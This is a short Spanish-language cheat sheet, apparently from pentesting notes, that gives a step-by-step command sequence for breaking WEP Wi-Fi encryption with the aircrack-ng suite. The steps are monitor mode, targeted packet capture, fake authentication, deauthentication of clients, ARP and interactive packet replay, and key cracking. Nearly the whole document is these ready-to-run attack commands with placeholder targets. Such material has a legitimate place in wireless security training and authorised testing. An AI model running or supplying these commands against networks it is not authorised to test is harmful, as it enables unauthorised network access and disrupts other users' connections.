WEP
WEP, Wired Equivalent Privacy (WEP).
Habilitar modo monitor en tarjeta inalámbrica.
sudo airmon-ng check kill && sudo airmon-ng start <interface> && iw dev <interface-mon> info
sudo airmon-ng check kill && sudo airmon-ng start wlan0 && iw dev wlan0mon info
Captura de paquetes para identificar BSSID, ESSID y canal objetivo.
sudo airodump-ng <interface-mon>
Captura de paquetes de BSSID, ESSID y canal específico.
sudo airodump-ng <interface-mon> --bssid <BSSID> --essid <ESSID> -c <channel> -w <file-name> --output-format pcap
Obtener dirección MAC de tarjeta inalámbrica en modo monitor.
macchanger --show <interface-mon>
Autenticación falsa.
sudo aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <interface-mon-mac-address> <interface-mon>
Desautenticación de cliente(s).
# Desautenticación dirigida
sudo aireplay-ng -0 1 -a <BSSID> -c <client-mac-address> <interface-mon>
# Desautenticación broadcast
sudo aireplay-ng -0 1 -a <BSSID> <interface-mon>
ARP request replay.
# Autenticación falsa
sudo aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <interface-mon-mac-address> <interface-mon>
# ARP request replay
sudo aireplay-ng -3 -b <BSSID> -h <interface-mon-mac-address> <interface-mon>
# Desautenticación de cliente
sudo aireplay-ng -0 1 -a <BSSID> -c <client-mac-address> <interface-mon>
Interactive packet replay.
# Autenticación falsa
sudo aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <interface-mon-mac-address> <interface-mon>
# Interactive packet replay
sudo aireplay-ng -2 -b <BSSID> -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 <interface-mon>
Cracking con Aircrack-ng.
aircrack-ng <file-name>.cap
Última actualización